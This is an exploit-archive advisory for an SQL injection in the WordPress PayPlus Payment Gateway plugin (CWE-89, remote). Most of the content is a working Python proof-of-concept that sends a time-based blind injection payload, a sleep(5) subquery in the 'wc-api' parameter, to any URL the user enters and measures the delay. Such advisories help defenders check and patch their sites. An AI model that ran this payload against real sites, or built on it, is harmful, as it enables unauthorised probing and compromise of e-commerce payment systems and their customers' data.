WordPress PayPlus Payment Gateway SQL Injection

2024.08.08

Credit: j3r1ch0123

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

#!/usr/bin/env python3.11
import requests
import time
def exploit(url):
payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}
start = time.time()
with requests.Session() as session:
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
})
response = requests.get(url, params=payload)
print(f"Exploiting {url}...")
end = time.time()
print(response.status_code)
response_time = end - start
print(f"Response time: {response_time}...")
if __name__ == "__main__":
url = input("Enter the vulnerable URL (e.g., https://test.site): ")
if not url.startswith("http"):
url = "http://" + url
exploit(url)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress PayPlus Payment Gateway SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.